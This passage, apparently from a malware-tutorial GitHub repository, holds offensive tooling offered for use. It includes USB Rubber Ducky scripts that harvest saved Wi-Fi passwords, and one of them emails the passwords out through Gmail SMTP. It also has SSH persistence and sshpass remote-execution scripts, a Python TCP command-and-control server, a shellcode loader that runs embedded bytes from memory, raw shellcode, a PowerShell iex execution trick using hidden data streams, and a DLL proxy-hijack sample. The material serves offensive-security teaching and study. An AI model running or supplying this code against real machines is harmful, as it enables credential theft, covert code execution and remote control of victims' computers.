Card] 44 | ```powershell 45 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit 46 | ``` 47 | 3. flash Twin-Duck firmware on to your duck 48 | - [Tutorial](https://www.youtube.com/watch?v=BzYH-BPHLpE) 49 | 4. load, encode, and deploy!! 50 | 51 | --- 52 | 53 | - hope you enjoy the payload!! 54 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 55 | 56 | #projects #malware 57 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/p.ps1: -------------------------------------------------------------------------------- 1 | # smtp based wifi password stealer 2 | # created by : C0SM0 3 | 4 | # change to your gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # exfiltrate wifi creds to file 9 | # file named after username 10 | $creds = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String 11 | 12 | # email creds via smtp 13 | $subject = "$env:UserName wifi passwords" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $creds); 18 | -------------------------------------------------------------------------------- /rubberducky/duckylan-smtp/payload.txt: -------------------------------------------------------------------------------- 1 | REM usb rubber ducky wifi password exfiltrator [smtp] 2 | REM created by : C0SM0 3 | 4 | REM let the computer recognize the twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 300 13 | 14 | REM cd into twinduck labled "W" and run the 'p.ps1' file 15 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit 16 | ENTER 17 | 18 | -------------------------------------------------------------------------------- /rubberducky/encoder/README.md: -------------------------------------------------------------------------------- 1 | MaMe82's Python port of infamous hak5 DuckEncoder 2 | 3 | Added in additional commandline parameters to pipe in STDIN. 4 | 5 | -p (--passthru) could be used to pipe in DuckyScript from STDIN. Example 6 | 7 | cat duckyscript.txt | python duckencoder.py -p -l de > inject.bin 8 | 9 | -r (--rawpassthru) could be used to pipe thru raw ASCII to a keyboard device. Example 10 | 11 | 12 | cat text.txt | python duckencoder.py -r -l de > /dev/hidg0 13 | 14 | Usage 15 | 16 | Duckencoder python port 1.0 by MaMe82 17 | ===================================== 18 | 19 | Creds to: hak5Darren for original duckencoder 20 | https://github.com/hak5darren/USB-Rubber-Ducky 21 | 22 | Converts payload created by DuckEncoder to sourcefile for DigiSpark Sketch 23 | 24 | Usage: python duckencoder.py -i [file ..] Encode DuckyScript source given by -i file 25 | or: python duckencoder.py -i [file ..] -o [outfile ..] Encode DuckyScript source to outputfile given by -o 26 | 27 | Arguments: 28 | -i [file ..] Input file in DuckyScript format 29 | -o [file ..] Output File for encoded payload, defaults to inject.bin 30 | -l Keyboard Layout (us/fr/pt/de ...) 31 | -p, --pastthru Read script from stdin and print result on stdout (ignore -i, -o) 32 | -r, --rawpassthru Like passthru, but input is read as STRING instead of duckyscript 33 | -h Print this help screen 34 | -------------------------------------------------------------------------------- /rubberducky/helloworld/inject.bin: -------------------------------------------------------------------------------- 1 | ,, ,,,,,1 6,1(,,,7,''((,, , ,,, 2 |  ,,,,(,&'''((,,( 3 |  ,(,''((,,(  4 | ,(((,,1 6,1, , ,(,''(  5 | , 6,( -------------------------------------------------------------------------------- /rubberducky/helloworld/payload.txt: -------------------------------------------------------------------------------- 1 | REM payload that opens notepad and types 'Hello, World!' 2 | REM Created by : C0SM0 3 | 4 | REM allocates time for computer to recognize ducky as a keyboard 5 | DELAY 9000 6 | 7 | REM opens runbox 8 | GUI r 9 | DELAY 100 10 | 11 | REM open notepad 12 | STRING notepad 13 | ENTER 14 | 15 | REM type 'Hello, World!' into the notepad 16 | DELAY 200 17 | STRING Hello, World! 18 | -------------------------------------------------------------------------------- /rubberducky/twinduck-wifipass/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/twinduck-wifipass/inject.bin -------------------------------------------------------------------------------- /rubberducky/twinduck-wifipass/payload.txt: -------------------------------------------------------------------------------- 1 | REM Exfiltrate wifi passwords to usb [or twinduck] 2 | REM Created By : Blue Cosmo 3 | 4 | REM let computer recognize twinduck 5 | DELAY 1000 6 | 7 | REM open powershell via runbox 8 | GUI r 9 | DELAY 200 10 | STRING powershell 11 | ENTER 12 | DELAY 200 13 | 14 | REM cd into drive labeled "W" 15 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name 16 | ENTER 17 | DELAY 100 18 | 19 | REM exfiltrate wifi passwords to file 20 | REM file named after computer username 21 | STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt" 22 | ENTER 23 | DELAY 300 24 | STRING exit 25 | ENTER 26 | -------------------------------------------------------------------------------- /rubberducky/webattack/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/webattack/inject.bin -------------------------------------------------------------------------------- /rubberducky/webattack/payload.txt: -------------------------------------------------------------------------------- 1 | REM opens website 2 | REM Created by : C0SM0 3 | 4 | REM allocate time for recognition 5 | DELAY 1000 6 | 7 | REM open runbox 8 | GUI r 9 | DELAY 100 10 | 11 | REM open website 12 | STRING www.cosmodiumcs.com 13 | ENTER 14 | -------------------------------------------------------------------------------- /ssh/disable-ssh-persistence.ps1: -------------------------------------------------------------------------------- 1 | Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 2 | Stop-Service sshd 3 | -------------------------------------------------------------------------------- /ssh/enable-ssh-persistence.ps1: -------------------------------------------------------------------------------- 1 | Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 2 | Start-Service sshd 3 | Set-Service -Name sshd -StartupType 'Automatic' 4 | -------------------------------------------------------------------------------- /ssh/remote-code-exec.sh: -------------------------------------------------------------------------------- 1 | # replace `ls` with intended command 2 | ssh user@host 'ls' 3 | 4 | # combine with `sshpass` to bypass password prompt 5 | sshpass -p "password" ssh user@host 'ls' 6 | -------------------------------------------------------------------------------- /tcp/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -Wall -Wextra 3 | 4 | TARGET = agent 5 | 6 | all: $(TARGET) 7 | 8 | $(TARGET): agent.c 9 | $(CC) $(CFLAGS) -o $@ $^ 10 | 11 | clean: 12 | rm -f $(TARGET) 13 | 14 | -------------------------------------------------------------------------------- /tcp/agent: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/tcp/agent -------------------------------------------------------------------------------- /tcp/c2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # basic tcp c2 3 | 4 | # created by : bluecosmo 5 | 6 | # imports 7 | import socket 8 | 9 | # constants 10 | HOST = "127.0.0.1" 11 | PORT = 2583 12 | 13 | # main code 14 | def main(): 15 | 16 | # setup socket 17 | print("[*] Building socket...") 18 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 19 | s.bind((HOST, PORT)) 20 | 21 | # listent for connections 22 | print("[*] Listining for connections...") 23 | s.listen() 24 | connection, address = s.accept() 25 | 26 | # connection established 27 | with connection: 28 | print(f"[+] Connected to : {address}") 29 | 30 | # command and control 31 | while True: 32 | msg = input("[~] Command : ").encode() 33 | connection.sendall(msg) 34 | 35 | # parse and display response data 36 | data = b"" 37 | while True: 38 | chunk = connection.recv(1024) 39 | if not chunk: 40 | break 41 | data += chunk 42 | if b"\0" in chunk: 43 | break 44 | 45 | if (msg.startswith(b"download")): 46 | with open(msg.decode().split(" ")[1], 'wb') as f: 47 | f.write(data) 48 | print("[+] File downloaded successfully.") 49 | 50 | else: 51 | print(data.decode()) 52 | 53 | # run main code 54 | if __name__ == '__main__': 55 | main() 56 | -------------------------------------------------------------------------------- /tcp/poc.txt: -------------------------------------------------------------------------------- 1 | hi 2 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/README.md: -------------------------------------------------------------------------------- 1 | # Alternative Data Stream (ADS) 2 | 3 | ## Resources 4 | - [Video](https://youtu.be/MZevjpUJ-I8) 5 | 6 | ## Hiding Data W/ ADS 7 | ```cmd 8 | REM add text to file 9 | echo poc > hideme.txt 10 | 11 | REM the following will dislpay the text 12 | type hideme.txt 13 | 14 | REM create ADS, specified with colon 15 | type hidem.txt > logo.png:myads.txt 16 | 17 | REM after doing a dir listing, file sizes will be the same 18 | REM delete original file 19 | del hideme.txt 20 | 21 | REM view image and ads 22 | start logo.png 23 | notepad logo.png:myads.txt 24 | 25 | REM discover ADS in directory 26 | dir /r 27 | ``` 28 | 29 | ## Execution Payload 30 | ```powershell 31 | $c = get-content image.png -stream ads.txt; iex $c 32 | ``` 33 | 34 | ## Executing Video 35 | ```powershell 36 | "C:\Program Files\Windows Media Player\wmplayer.exe" "C:\Path\To\ads.png:grad.mp4" 37 | ``` 38 | 39 | ## Executing Binary 40 | ```powershell 41 | 42 | ./ads.png:main.exe 43 | ``` 44 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/ads.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/ads.png -------------------------------------------------------------------------------- /videos/alternative-data-streams/grad.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/grad.mp4 -------------------------------------------------------------------------------- /videos/alternative-data-streams/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #pragma comment(lib, "user32.lib") 3 | 4 | int main(VOID) { 5 | MessageBox(NULL, "subscribe :D", "CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 6 | 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/main.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/main.exe -------------------------------------------------------------------------------- /videos/alternative-data-streams/payload.txt: -------------------------------------------------------------------------------- 1 | calc.exe 2 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/README.md: -------------------------------------------------------------------------------- 1 | # Resources 2 | - [Video](https://youtu.be/tS0pRL7979E) 3 | - [SysInternals](https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) 4 | - [PUSHAD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/PUSHA.htm) 5 | - [PUSHFD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/PUSHF.htm) 6 | - [POPAD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/POPA.htm) 7 | - [POPFD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/POPF.htm) 8 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/ZoomIt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/ZoomIt.exe -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/calc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/calc.bin -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #pragma comment(lib, "user32.lib") 3 | 4 | int main(VOID) { 5 | MessageBox(NULL, "subscribe :D", "CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 6 | 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/main.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/main.exe -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/zoomit.log: -------------------------------------------------------------------------------- 1 | zoomit.exe 2 | 3 | entry point: 4 | 0039B025 | E8 A5060000 | call | 5 | 0039B02A | E9 7AFEFFFF | jmp zoomit.39AEA9 | 6 | 0039B02F | 55 | push ebp | 7 | 0039B030 | 8BEC | mov ebp,esp | 8 | 0039B032 | 6A 00 | push 0 | 9 | 0039B034 | FF15 98613C00 | call dword ptr ds:[<&SetUnhandledExcept | 10 | 0039B03A | FF75 08 | push dword ptr ss:[ebp+8] | 11 | 0039B03D | FF15 DC623C00 | call dword ptr ds:[<&UnhandledException | 12 | 13 | code cave: 14 | 003C5827 | 0000 | add byte ptr ds:[eax],al | 15 | 16 | popfd: 17 | 00CF58EB | 9D | popfd | -------------------------------------------------------------------------------- /videos/embedding-shellcode/README.md: -------------------------------------------------------------------------------- 1 | - [malapi](https://malapi.io) 2 | - [VirtualAlloc](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) 3 | - [RtlMoveMemory](https://learn.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory) 4 | - [VirtualProtect](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 5 | - [CreateThread](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) 6 | - [WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) 7 | - [FindResourceA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea) 8 | - [LoadResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadresource) 9 | - [LockResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-lockresource) 10 | - [SizeofResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-sizeofresource) -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/a.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.ilk -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/vc140.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/embed-rsrc.cpp: -------------------------------------------------------------------------------- 1 | // embed shellcode in .text section 2 | // created by : bluecosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | #define SC_ICON 2583 10 | 11 | // main code 12 | int main(VOID) { 13 | 14 | // find shellcode payload 15 | HRSRC shellcode = FindResourceW(NULL, MAKEINTRESOURCEW(SC_ICON), RT_RCDATA 16 | // [in, optional] HMODULE hModule, 17 | // [in] LPCSTR lpName, 18 | // [in] LPCSTR lpType 19 | ); 20 | 21 | // load shellcode payload 22 | HGLOBAL shellcode_handle = LoadResource(NULL, shellcode 23 | // [in, optional] HMODULE hModule, 24 | // [in] HRSRC hResInfo 25 | ); 26 | 27 | // get pointer to shellcode payload 28 | LPVOID shellcode_payload = LockResource(shellcode_handle 29 | // [in] HGLOBAL hResData 30 | ); 31 | 32 | // get lenght of shellcode payload 33 | DWORD shellcode_length = SizeofResource(NULL, shellcode 34 | // [in, optional] HMODULE hModule, 35 | // [in] HRSRC hResInfo 36 | ); 37 | 38 | // allocate the memory 39 | LPVOID memory_address = VirtualAlloc(NULL, shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE 40 | // [in, optional] LPVOID lpAddress, 41 | // [in] SIZE_T dwSize, 42 | // [in] DWORD flAllocationType, 43 | // [in] DWORD flProtect 44 | ); 45 | 46 | // load shellcode into memory 47 | RtlMoveMemory(memory_address, shellcode_payload, shellcode_length 48 | // _Out_       VOID UNALIGNED *Destination, 49 | // _In_  const VOID UNALIGNED *Source, 50 | // _In_        SIZE_T         Length 51 | ); 52 | 53 | // make shellcode executable 54 | DWORD old_protection = 0; 55 | BOOL returned_vp = VirtualProtect(memory_address, shellcode_length, PAGE_EXECUTE_READ, & old_protection 56 | // [in] LPVOID lpAddress, 57 | // [in] SIZE_T dwSize, 58 | // [in] DWORD flNewProtect, 59 | // [out] PDWORD lpflOldProtect 60 | ); 61 | 62 | // execute thread 63 | if (returned_vp != NULL) { 64 | HANDLE thread_handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) memory_address, NULL, NULL, NULL 65 | // [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, 66 | // [in] SIZE_T dwStackSize, 67 | // [in] LPTHREAD_START_ROUTINE lpStartAddress, 68 | // [in, optional] __drv_aliasesMem LPVOID lpParameter, 69 | // [in] DWORD dwCreationFlags, 70 | // [out, optional] LPDWORD lpThreadId 71 | ); 72 | 73 | // waite for thread to complete 74 | WaitForSingleObject(thread_handle, INFINITE 75 | // [in] HANDLE hHandle, 76 | // [in] DWORD dwMilliseconds 77 | ); 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/embed-rsrc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/embed-rsrc.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/embed-rsrc.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/embed-rsrc.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/notepad32.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/notepad32.ico -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/rsrc.o -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.rc: -------------------------------------------------------------------------------- 1 | #define SC_ICON 2583 2 | SC_ICON RCDATA "notepad32.ico" 3 | -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/rsrc.res -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.ilk -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/vc140.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/notepad32.c: -------------------------------------------------------------------------------- 1 | /* C:\Users\cosmo\development\shellcode\notepad32.bin (5/25/2023 9:24:57 PM) 2 | StartOffset(h): 00000000, EndOffset(h): 000000C3, Length(h): 000000C4 */ 3 | 4 | unsigned char rawData[196] = { 5 | 0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 6 | 0x8B, 0x50, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 7 | 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 8 | 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52, 9 | 0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 10 | 0x51, 0x8B, 0x59, 0x20, 0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 11 | 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC, 0xC1, 0xCF, 0x0D, 0x01, 12 | 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75, 13 | 0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 14 | 0x58, 0x1C, 0x01, 0xD3, 0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 15 | 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF, 0xE0, 0x5F, 0x5F, 0x5A, 16 | 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00, 17 | 0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 18 | 0x2A, 0x0A, 0x68, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 19 | 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 20 | 0x00, 0x53, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 21 | 0x65, 0x78, 0x65, 0x00 22 | }; 23 | -------------------------------------------------------------------------------- /videos/fun-with-dlls/README.md: -------------------------------------------------------------------------------- 1 | - [video]() 2 | - [nim dll](https://github.com/byt3bl33d3r/OffensiveNim#creating-windows-dlls-with-an-exported-dllmain) 3 | - [create process win32](https://learn.microsoft.com/en-us/windows/win32/procthread/creating-processes) 4 | - [ippsec](https://youtu.be/3eROsG_WNpE) 5 | -------------------------------------------------------------------------------- /videos/fun-with-dlls/cosmo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/cosmo.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-loader.cpp: -------------------------------------------------------------------------------- 1 | // dll loader 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | using namespace std; 10 | 11 | // main code 12 | int main(int argc, char* argv[]) { 13 | 14 | // exception 15 | if (argc < 2) { 16 | printf("[!] Run : dll-loader.exe \n"); 17 | return EXIT_FAILURE; 18 | } 19 | 20 | // get parsed file 21 | LPCSTR dll_file = argv[1]; 22 | std::string file_name = argv[1]; 23 | printf("[*] Loading : %s...\n", file_name); 24 | 25 | // load dll 26 | HINSTANCE hDll; 27 | hDll = LoadLibrary(TEXT(dll_file)); 28 | 29 | return EXIT_SUCCESS; 30 | 31 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/dll-loader.exe -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-proxy.c: -------------------------------------------------------------------------------- 1 | // "malicious" dll 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #pragma comment(lib, "user32.lib"); 7 | 8 | // dll proxy 9 | #pragma comment(linker, "/export:CscNetApiGetInterface=cscapi.CscNetApiGetInterface"); 10 | #pragma comment(linker, "/export:CscSearchApiGetInterface=cscapi.CscSearchApiGetInterface"); 11 | #pragma comment(linker, "/export:OfflineFilesEnable=cscapi.OfflineFilesEnable"); 12 | #pragma comment(linker, "/export:OfflineFilesGetShareCachingMode=cscapi.OfflineFilesGetShareCachingMode"); 13 | #pragma comment(linker, "/export:OfflineFilesQueryStatus=cscapi.OfflineFilesQueryStatus"); 14 | #pragma comment(linker, "/export:OfflineFilesQueryStatusEx=cscapi.OfflineFilesQueryStatusEx"); 15 | #pragma comment(linker, "/export:OfflineFilesStart=cscapi.OfflineFilesStart"); 16 | 17 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID LpReserved) { 18 | switch(dwReason) { 19 | case DLL_PROCESS_ATTACH: 20 | STARTUPINFO si; 21 | PROCESS_INFORMATION pi; 22 | 23 | ZeroMemory( &si, sizeof(si) ); 24 | si.cb = sizeof(si); 25 | ZeroMemory( &pi, sizeof(pi) ); 26 | 27 | // Start the child process. 28 | if( !CreateProcess( 29 | "C:\\Windows\\System32\\calc.exe", // No module name (use command line) 30 | NULL, // Command line 31 | NULL, // Process handle not inheritable 32 | NULL, // Thread handle not inheritable 33 | FALSE, // Set handle inheritance to FALSE 34 | CREATE_NO_WINDOW, // No creation flags 35 | NULL, // Use parent's environment block 36 | NULL, // Use parent's starting directory 37 | &si, // Pointer to STARTUPINFO structure 38 | &pi ) // Pointer to PROCESS_INFORMATION structure 39 | ) 40 | { 41 | return EXIT_FAILURE; 42 | } 43 | 44 | // Close process and thread handles. 45 | CloseHandle( pi.hProcess ); 46 | CloseHandle( pi.hThread ); 47 | 48 | break; 49 | } 50 | 51 | return EXIT_SUCCESS; 52 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll.c: -------------------------------------------------------------------------------- 1 | // "malicious" dll 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #pragma comment(lib, "user32.lib"); 7 | 8 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID LpReserved) { 9 | switch(dwReason) { 10 | case DLL_PROCESS_ATTACH: 11 | MessageBoxW(NULL, L"Subscribe :D", L"CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 12 | break; 13 | } 14 | 15 | return TRUE; 16 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/proxy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/proxy.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/shell.dll: -------------------------------------------------------------------------------- 